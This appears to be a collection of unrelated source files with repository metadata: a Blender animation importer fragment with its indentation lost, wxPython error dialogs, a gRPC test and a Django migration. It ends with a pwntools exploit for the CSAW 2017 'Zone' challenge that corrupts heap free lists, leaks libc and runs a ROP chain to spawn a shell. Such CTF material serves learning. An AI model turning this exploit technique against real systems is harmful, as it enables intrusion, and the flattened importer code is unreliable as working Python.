# this (each contains translation and rotation):
# origin_s*origin_d*bone_1_s*bone_1_d*....*bone_n_s*bone_n_d
def get_dynamic_mtx(p_bone, frame):
if frame not in p_bone.computed_d_matrices.keys():
local_mtx_y, local_mtx_ydL, local_mtx_ydR = p_bone.frames.get_mtx(frame)
inv_static_mtx = p_bone.jnt_frame.getFrameMatrix().inverted()
p_bone.computed_d_matrices[frame] = (inv_static_mtx * local_mtx_y,
inv_static_mtx * local_mtx_ydL,
inv_static_mtx * local_mtx_ydR)
return p_bone.computed_d_matrices[frame]
def get_pos_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_translation()
ydL = ydL.to_translation()
ydR = ydR.to_translation()
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).position()
dL = (ydL-y)/EPSILON
dR = (ydR-y)/EPSILON
return y, dL, dR
def get_rot_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_euler('XYZ')
ydL = ydL.to_euler('XYZ')
ydR = ydR.to_euler('XYZ')
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).rotation()
dL = product(1/EPSILON, subtract2(ydL, y))
dR = product(1/EPSILON, subtract2(ydR, y))
return y, dL, dR
def get_sc_vct(p_bone, frame):
y, dL, dR = p_bone.frames.get_sc(frame)
y.x /= p_bone.jnt_frame.sx
y.y /= p_bone.jnt_frame.sy
y.z /= p_bone.jnt_frame.sz
dL.x /= p_bone.jnt_frame.sx
dL.y /= p_bone.jnt_frame.sy
dL.z /= p_bone.jnt_frame.sz
dR.x /= p_bone.jnt_frame.sx
dR.y /= p_bone.jnt_frame.sy
dR.z /= p_bone.jnt_frame.sz
return y, dL, dR
instances = {}
class KeyFrames:
def __init__(self):
self.times = {}
self.positions = [{}, {}, {}]
self.rotations = [{}, {}, {}]
self.scales = [{}, {}, {}]
def feed_anim(self, anim, include_sc=True, fr_sc=1, fr_of=0):
for key in anim.translationsX:
self.positions[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsY:
self.positions[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsZ:
self.positions[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.rotationsX:
self.rotations[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsY:
self.rotations[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsZ:
self.rotations[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
if include_sc:
for key in anim.scalesX:
self.scales[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesY:
self.scales[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesZ:
self.scales[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
        # add a last frame to everything (to avoid crashes), but do not register them as 'real'
anim_length = max(self.times.keys())
for coordinate in (0,1,2):
max_time = max(self.positions[coordinate].keys())
if max_time < anim_length:
self.positions[coordinate][anim_length] = self.positions[coordinate][max_time]
max_time = max(self.rotations[coordinate].keys())
if max_time < anim_length:
self.rotations[coordinate][anim_length] = self.rotations[coordinate][max_time]
max_time = max(self.scales[coordinate].keys())
if max_time < anim_length:
self.scales[coordinate][anim_length] = self.scales[coordinate][max_time]
def _get_vt(self, data, time):
if time in data.keys():
return data[time]
elif len(data.keys()) == 1:
return next(iter(data.values()))
prev_t = -math.inf
next_t = +math.inf
for frame_t in data.keys():
if prev_t < frame_t < time:
prev_t = frame_t
elif time < frame_t < next_t:
next_t = frame_t
return cubic_interpolator(prev_t, data[prev_t][0], data[prev_t][2],
next_t, data[next_t][0], data[next_t][1], time)
def get_pos(self, time):
temp_x = self._get_vt(self.positions[0], time)
temp_y = self._get_vt(self.positions[1], time)
temp_z = self._get_vt(self.positions[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_rot(self, time):
temp_x = self._get_vt(self.rotations[0], time)
temp_y = self._get_vt(self.rotations[1], time)
temp_z = self._get_vt(self.rotations[2], time)
return (Euler((temp_x[0], temp_y[0], temp_z[0]), 'XYZ'),
Euler((temp_x[1], temp_y[1], temp_z[1]), 'XYZ'),
Euler((temp_x[2], temp_y[2], temp_z[2]), 'XYZ'))
def get_sc(self, time):
temp_x = self._get_vt(self.scales[0], time)
temp_y = self._get_vt(self.scales[1], time)
temp_z = self._get_vt(self.scales[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_mtx(self, time):
EPSILON = 1E-4
vct_y, vct_dL, vct_dR = self.get_pos(time)
rot_y, rot_dL, rot_dR = self.get_rot(time)
vct_ydL = sum2(vct_y, product(EPSILON, vct_dL))
rot_ydL = sum2(rot_y, product(EPSILON, rot_dL))
vct_ydR = sum2(vct_y, product(EPSILON, vct_dR))
rot_ydR = sum2(rot_y, product(EPSILON, rot_dR))
return ( (Matrix.Translation(vct_y) * rot_y.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydL) * rot_ydL.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydR) * rot_ydR.to_matrix().to_4x4()) )
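# Illustrative sketch (not part of the original importer): the intended
# KeyFrames workflow is to feed it one decoded joint animation and then sample
# it per frame. `anim` is assumed to expose translationsX/rotationsX/scalesX
# (etc.) key lists, as consumed by feed_anim above; it is not defined here.
def _keyframes_usage_example(anim, frame):
    kf = KeyFrames()
    kf.feed_anim(anim)
    return kf.get_pos(frame), kf.get_rot(frame), kf.get_sc(frame)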
class Pseudobone:
def __init__(self, parentBone, frame, matrix, startpoint, endpoint):
self._name = None
ori = endpoint - startpoint
self.endpoint = endpoint
self.length = math.sqrt(ori.x**2 + ori.y**2 + ori.z**2)
self.orientation = vect_normalize(ori)
self.scale = Vector((1, 1, 1))
self.jnt_frame = None
# self.rotation_euler = Euler((0, 0, 0), 'XYZ')
self.position = startpoint
self.frames = KeyFrames()
# self.inverted_static_mtx = None
self.computed_d_matrices = {}
self.computed_t_matrices = {}
# self.scale_kf = {} # keyframes (values)
# self.scale_tkf = {} # keyframes (tangents)
# self.rotation_kf = {}
# self.rotation_tkf = {}
# self.position_kf = {}
# self.position_tkf = {}
# self.transform = mathutils.Matrix.Identity(4) # what to do with that? it will be ultimately useless.
self._parent = None
self.children = []
# property business --------------------------------
def _getname():
return self._name
def _setname(val):
global instances
if self._name is not None:
del instances[self._name]
if val is None and val in instances.keys():
raise ValueError('name taken')
self._name = val
instances[val] = self
def _delname():
self.name = None
self.name = property(_getname, _setname, _delname)
def _getparent():
return self._parent
def _setparent(val):
if isinstance(self.parent.fget(), Pseudobone) and (self in self.parent.fget().children):
self.parent.fget().children.remove(self)
self._parent = val
if val is None or isinstance(val, Vector):
return
val.children.append(self)
self.parent = property(_getparent, _setparent)
def _setinchildren(holder, val):
list.append(holder.children, val)
val._parent = holder
# self.children_append = (lambda self2, x: _setinchildren(self, x))
if isinstance(frame, str):
self.name.fset(frame)
else:
self.jnt_frame = frame
self.name.fset(frame.name)
self.parent.fset(parentBone)
self.matrix = matrix
# defines self.name, self.parent, self.children_append.
def pre_delete(self):
# call before losing variable to avoid memory leak
self.parent.fset(None)
for com in self.children:
com.pre_delete()
def _tree_to_array(self, dest):
"""inner function. do not call."""
dest.append(self)
for com in self.children:
com._tree_to_array(dest)
def tree_to_array(self):
"""returns a list of all bones"""
ret = []
self._tree_to_array(ret)
return ret
def reset(self):
self.frames = KeyFrames()
self.computed_d_matrices = {}
self.computed_t_matrices = {}
def get_z(self):
if common.GLOBALS.no_rot_conversion:
return rotation_part(self.matrix) * Vector((0,0,1))
else:
return NtoB*rotation_part(self.matrix)*BtoN * Vector((0,0,1))
def getBoneByName(name):
global instances
try:
return instances[name]
except KeyError:
return None
def getvct(one, distance, tgt):
"""get the right keyframe handle vector""" # XCX use me!
# method one:
return Vector((one, one*tgt))
finder = re.compile(r'''pose\.bones\[['"](\w*)['"]\]\.(\w*)''')
#used to determine what curves belong to what bones
def apply_animation(bones, arm_obj, jntframes, name=None):
"""apply keyframes from pseudobones to real, armature bones"""
if name:
arm_obj.animation_data.action = bpy.data.actions.new(name + '_action')
else:
arm_obj.animation_data.action = bpy.data.actions.new(arm_obj.name+'_action')
bpy.context.scene.frame_current = 0
# warning: here, the `name` var changes meaning
for com in bones:
name = com.name.fget()
arm_obj.data.bones[name].use_inherit_scale = False # scale can be applied
posebone = arm_obj.pose.bones[name]
if common.GLOBALS.no_rot_conversion:
posebone.rotation_mode = "XYZ"
else:
posebone.rotation_mode = "XZY" # remember, coords are flipped
bpy.context.scene.frame_current = 0
# this keyframe is needed, overwritten anyways
# also it is always at 1 because this function is called once per action
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
fcurves = arm_obj.animation_data.action.fcurves
data = {}
for curve in fcurves:
# create data in dicts ({bonename:{datatype:[0,1,2]...}...})
try:
bonename, datatype = finder.match(curve.data_path).groups()
        except TypeError: # cannot unpack None: this fcurve is not interesting
continue
bonedict = common.dict_get_set(data, bonename, {})
datadict = common.dict_get_set(bonedict, datatype, [None, None, None])
datadict[curve.array_index] = curve
    # create keyframes, with tangents
for com in bones:
name = com.name.fget()
bonedict = data[name]
posebone = arm_obj.pose.bones[name]
bpy.context.scene.frame_current = 0
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
every_frame = list(com.frames.times.keys())
every_frame.sort()
refpos = com.jnt_frame
if type(com.parent.fget()) is not Pseudobone:
com.rotmatrix = Matrix.Identity(4)
com.parentrot = Matrix.Identity(4)
else:
com.rotmatrix = com.parent.fget().rotmatrix
com.parentrot = com.parent.fget().rotmatrix
tempmat = Euler((refpos.rx, refpos.ry, refpos.rz), 'XYZ').to_matrix().to_4x4()
com.rotmatrix *= tempmat
cancel_ref_rot = tempmat.inverted()
for frame in every_frame:
bpy.context.scene.frame_current = frame
# flip y and z when asked for
if com.frames.times[frame][0]:
vct, tgL, tgR = get_pos_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.location[0] = vct.x
co = bonedict['location'][0].keyframe_points[-1].co
bonedict['location'][0].keyframe_points[-1].handle_left = co+Vector((-1, -tgL.x))
bonedict['location'][0].keyframe_points[-1].handle_right = co+Vector((1, tgR.x))
posebone.keyframe_insert('location', 0)
                    # fixed: add frame to keyframes AFTER setting the right value to it. so counter-intuitive.
if not math.isnan(vct.y):
posebone.location[1] = vct.y
co = bonedict['location'][1].keyframe_points[-1].co
bonedict['location'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['location'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('location', 1)
if not math.isnan(vct.z):
posebone.location[2] = vct.z
co = bonedict['location'][2].keyframe_points[-1].co
bonedict['location'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['location'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('location', 2)
if com.frames.times[frame][1]:
vct, tgL, tgR = get_rot_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.rotation_euler[0] = vct.x
co = bonedict['rotation_euler'][0].keyframe_points[-1].co
bonedict['rotation_euler'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['rotation_euler'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('rotation_euler', 0)
if not math.isnan(vct.y):
posebone.rotation_euler[1] = vct.y
co = bonedict['rotation_euler'][1].keyframe_points[-1].co
bonedict['rotation_euler'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['rotation_euler'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('rotation_euler', 1)
if not math.isnan(vct.z):
posebone.rotation_euler[2] = vct.z
co = bonedict['rotation_euler'][2].keyframe_points[-1].co
bonedict['rotation_euler'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['rotation_euler'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('rotation_euler', 2)
if com.frames.times[frame][2]:
vct, tgL, tgR = get_sc_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, tgL.z
tgR.z, tgR.y = tgR.y, tgR.z
vct.z, vct.y = vct.y, vct.z
if not math.isnan(vct.x):
posebone.scale[0] = vct.x
co = bonedict['scale'][0].keyframe_points[-1].co
bonedict['scale'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['scale'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('scale', 0)
if not math.isnan(vct.y):
posebone.scale[1] = vct.y
co = bonedict['scale'][1].keyframe_points[-1].co
bonedict['scale'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['scale'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('scale', 1)
if not math.isnan(vct.z):
posebone.scale[2] = vct.z
co = bonedict['scale'][2].keyframe_points[-1].co
bonedict['scale'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['scale'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('scale', 2)
return arm_obj.animation_data.action
|
gpl-3.0
| 5,015,250,740,609,675,000
| 39.481262
| 111
| 0.53735
| false
| 3.21035
| false
| false
| false
|
CFIS-Octarine/octarine
|
validate/gui/views/errorhandling.py
|
1
|
5325
|
__author__ = "David Rusk <drusk@uvic.ca>"
import wx
class CertificateDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(CertificateDialog, self).__init__(parent, title="Certificate Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
        self.header_text = wx.StaticText(self, label="An error has occurred "
"which likely indicates "
"your CADC certificate "
"is invalid:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.prompt_text = wx.StaticText(self, label="Enter your CADC "
"credentials to get a "
"new certificate:")
self.username_label = wx.StaticText(self, label="CADC Username: ")
self.username_field = wx.TextCtrl(self)
self.password_label = wx.StaticText(self, label="Password: ")
self.password_field = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.accept_button = wx.Button(self, label="Get certificate")
self.cancel_button = wx.Button(self, label="Cancel")
self.accept_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.username_field.SetFocus()
self.accept_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
vsizer.Add(self.prompt_text, flag=flag, border=border)
input_sizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=border)
input_sizer.Add(self.username_label)
input_sizer.Add(self.username_field, proportion=1, flag=wx.EXPAND)
input_sizer.Add(self.password_label, wx.EXPAND)
input_sizer.Add(self.password_field, proportion=1, flag=wx.EXPAND)
input_sizer.AddGrowableCol(1, proportion=1)
vsizer.Add(input_sizer, flag=wx.EXPAND)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.accept_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
username = self.username_field.GetValue()
password = self.password_field.GetValue()
self.handler.refresh_certificate(username, password)
self.Close()
class RetryDownloadDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(RetryDownloadDialog, self).__init__(parent, title="Download Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="One or more downloads "
"failed:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.retry_button = wx.Button(self, label="Retry")
self.cancel_button = wx.Button(self, label="Cancel")
self.retry_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.retry_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.retry_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
self.handler.retry_downloads()
self.Close()
|
gpl-3.0
| -8,906,130,566,601,220,000
| 36.244755
| 95
| 0.604131
| false
| 3.622449
| false
| false
| false
|
firebase/grpc-SwiftPM
|
src/python/grpcio_tests/tests_aio/unit/init_test.py
|
1
|
1698
|
# Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
import grpc
from grpc.experimental import aio
from tests_aio.unit._test_server import start_test_server
from tests_aio.unit._test_base import AioTestBase
class TestInsecureChannel(AioTestBase):
async def test_insecure_channel(self):
server_target, _ = await start_test_server() # pylint: disable=unused-variable
channel = aio.insecure_channel(server_target)
self.assertIsInstance(channel, aio.Channel)
class TestSecureChannel(AioTestBase):
"""Test a secure channel connected to a secure server"""
def test_secure_channel(self):
async def coro():
server_target, _ = await start_test_server(secure=True) # pylint: disable=unused-variable
credentials = grpc.local_channel_credentials(
grpc.LocalConnectionType.LOCAL_TCP)
secure_channel = aio.secure_channel(server_target, credentials)
self.assertIsInstance(secure_channel, aio.Channel)
self.loop.run_until_complete(coro())
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
apache-2.0
| -660,082,624,246,504,200
| 32.294118
| 102
| 0.717314
| false
| 4.023697
| true
| false
| false
|
aggrent/cab
|
cab/migrations/0002_migrate_ratings.py
|
1
|
7081
|
# encoding: utf-8
from south.v2 import DataMigration
from django.contrib.contenttypes.models import ContentType
from django.db.models import signals
from ratings.models import RatedItem, SimilarItem
class Migration(DataMigration):
def forwards(self, orm):
signals.post_save.disconnect(sender=RatedItem, dispatch_uid='update_rating_score')
try:
ctype = ContentType.objects.get(app_label='cab', model='snippet')
except ContentType.DoesNotExist:
# If the content type doesn't even exist yet, this is probably a fresh installation
return
for rating in orm['cab.rating'].objects.all():
RatedItem.objects.create(
user_id=rating.user.pk,
object_id=rating.snippet.pk,
content_type=ctype,
score=rating.score)
def backwards(self, orm):
RatedItem.objects.all().delete()
SimilarItem.objects.all().delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cab.bookmark': {
'Meta': {'object_name': 'Bookmark'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmarks'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_bookmarks'", 'to': "orm['auth.User']"})
},
'cab.language': {
'Meta': {'object_name': 'Language'},
'file_extension': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'cab.rating': {
'Meta': {'object_name': 'Rating'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_ratings'", 'to': "orm['auth.User']"})
},
'cab.snippet': {
'Meta': {'object_name': 'Snippet'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bookmark_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'code': ('django.db.models.fields.TextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_html': ('django.db.models.fields.TextField', [], {}),
'highlighted_code': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cab.Language']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'rating_score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cab']
|
bsd-3-clause
| -4,519,894,992,598,839,300
| 63.963303
| 163
| 0.551758
| false
| 3.756499
| false
| false
| false
|
integeruser/on-pwning
|
2017-csaw-quals/Zone/zone.py
|
1
|
3639
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
if args['GDB']:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = gdb.debug('./zone-amd64-2.23-0ubuntu9', gdbscript='''\
c
''')
elif args['REMOTE']:
elf, libc = ELF('./zone'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = remote('pwn.chal.csaw.io', 5223)
else:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = process(['stdbuf', '-i0', '-o0', '-e0', './zone-amd64-2.23-0ubuntu9'])
def allocate(size):
io.recvuntil('5) Exit\n')
io.sendline('1')
io.sendline(str(size))
def delete_last():
io.recvuntil('5) Exit\n')
io.sendline('2')
io.recvuntil('Free')
def write_last(data, newline=True):
io.recvuntil('5) Exit\n')
io.sendline('3')
io.sendline(data) if newline else io.send(data)
def print_last():
io.recvuntil('5) Exit\n')
io.sendline('4')
return io.recvline()
io.recvuntil('Environment setup: ')
stack_leak_address = int(io.recvline(), 16)
success('stack leak address: %s' % hex(stack_leak_address))
# a chunk is of the form
# {size|ptr to the next free chunk of same size|data}
# allocate a 0x40 byte block
allocate(0x40)
# overflow the 65th byte of the block to be 0x80, so to modify the size of the next free block
write_last('A' * 0x40 + chr(0x80), newline=False)
# allocate another 0x40 byte block (the one with the size modified)
allocate(0x40)
# free this last block (which will be put at the top of the list of free chunks of size 0x80)
delete_last()
# allocate a chunk of size 0x80 to get this chunk
allocate(0x80)
# we can now write 0x80 characters into a chunk which is in the list of chunks of size 0x40
# so we can overflow into the next 0x40 chunk and corrupt its pointer to the next free chunk
write_last(fit({cyclic_find('jaaaaaaa', n=8): p64(stack_leak_address + 0x80 - 0x8)}))
# allocate two more 0x40 chunks
# the second chunk will be on the stack (since, in the first chunk, we changed the pointer to the next free chunk)
allocate(0x40)
allocate(0x40)
# print the content of the chunk to leak an address from libc
libc_leak_address = u64(print_last()[:6].ljust(8, '\x00'))
success('libc leak address: %s' % hex(libc_leak_address))
libc.address = libc_leak_address - (libc.symbols['__libc_start_main'] + 240)
success('libc address: %s' % hex(libc.address))
rop = ROP(libc)
rop.system(next(libc.search('/bin/sh')))
print rop.dump()
# write in the chunk to change the return address
write_last(bytes(rop))
# exit to return to execute the rop chain
io.recvuntil('5) Exit\n')
io.sendline('5')
io.interactive()
# $ ./zone.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 5223: Done
# [*] '/home/ubuntu/vbox/zone'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
# [*] '/home/ubuntu/vbox/libc-amd64-2.23-0ubuntu9.so'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] stack leak address: 0x7ffd63409140
# [+] libc leak address: 0x7efc0b64a830
